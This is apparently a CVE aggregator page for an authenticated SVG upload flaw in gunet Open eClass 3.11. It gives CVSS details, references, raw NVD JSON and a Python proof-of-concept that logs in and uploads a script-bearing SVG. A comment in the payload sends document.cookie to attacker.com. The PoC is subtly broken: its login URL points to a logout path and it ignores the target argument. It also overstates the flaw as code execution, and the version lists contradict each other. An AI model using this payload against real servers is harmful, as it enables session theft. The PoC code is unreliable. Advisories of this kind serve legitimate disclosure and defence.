CVE-2025-65734

Description

An authenticated arbitrary file upload vulnerability in the Courses/Work Assignments module of gunet Open eClass v3.11, and fixed in v3.13, allows attackers to execute arbitrary code via uploading a crafted SVG file.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openeclass:openeclass:*:*:*:*:*:*:*:* - VULNERABLE

gunet Open eClass < 3.11

gunet Open eClass 3.11

gunet Open eClass <= 3.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-65734 PoC - Malicious SVG File Upload
# Target: gunet Open eClass < 3.13
# Module: Courses/Work Assignments

TARGET_URL = "http://target-server.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/index.php?logout"
UPLOAD_URL = f"{TARGET_URL}/modules/work/work.php"
MALICIOUS_SVG = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="300" height="200">
  <script type="text/javascript">
    // Malicious JavaScript - XSS payload
    alert('XSS - CVE-2025-65734');
    // For RCE via SVG, this would need server-side processing
    // Example: <script>document.location='http://attacker.com/steal?c='+document.cookie</script>
  </script>
  <rect width="300" height="200" fill="red"/>
  <text x="10" y="100" fill="white">Malicious SVG</text>
</svg>"""

def login(session, username, password):
    """Login to Open eClass with low-privilege account"""
    login_data = {
        'username': username,
        'password': password,
        'submit': 'Login'
    }
    response = session.post(LOGIN_URL, data=login_data)
    return 'login' not in response.url.lower()

def upload_malicious_svg(session):
    """Upload malicious SVG file via Work Assignments module"""
    files = {
        'userfile': ('malicious.svg', MALICIOUS_SVG, 'image/svg+xml')
    }
    data = {
        'id': '1',  # Course ID
        'assignment_id': '1',  # Assignment ID
        'submit': 'Submit'
    }
    response = session.post(UPLOAD_URL, files=files, data=data)
    return response

def main():
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    session = requests.Session()
    
    print("[*] Logging in to Open eClass...")
    if not login(session, username, password):
        print("[-] Login failed")
        sys.exit(1)
    
    print("[*] Uploading malicious SVG file...")
    response = upload_malicious_svg(session)
    
    if response.status_code == 200:
        print("[+] SVG file uploaded successfully")
        print("[*] Access the file at: " + response.url)
        print("[*] If server executes SVG as PHP, remote code execution is possible")
    else:
        print("[-] Upload failed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65734
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65734
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65734/
[4] VulDB https://vuldb.com/cve/CVE-2025-65734
[5] https://github.com/apostolides
[6] https://huntr.com/bounties/540f743c-fa3e-4be6-9f85-439fff2fc5fe
[7] https://huntr.com/users/apostolides
[8] https://www.linkedin.com/in/thanos-apostolidis-3255591b1/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65734", "sourceIdentifier": "[email protected]", "published": "2026-03-16T17:16:28.137", "lastModified": "2026-04-17T21:01:15.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated arbitrary file upload vulnerability in the Courses/Work Assignments module of gunet Open eClass v3.11, and fixed in v3.13, allows attackers to execute arbitrary code via uploading a crafted SVG file."}, {"lang": "es", "value": "Una vulnerabilidad de carga arbitraria de archivos autenticada en el módulo de Cursos/Asignaciones de Trabajo de gunet Open eClass v3.11, y corregida en la v3.13, permite a los atacantes ejecutar código arbitrario mediante la carga de un archivo SVG manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openeclass:openeclass:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.11", "versionEndExcluding": "3.13", "matchCriteriaId": "08E7B986-4415-4530-A12F-B14BC96AC59F"}]}]}], "references": [{"url": "https://github.com/apostolides", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://huntr.com/bounties/540f743c-fa3e-4be6-9f85-439fff2fc5fe", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/users/apostolides", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/thanos-apostolidis-3255591b1/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}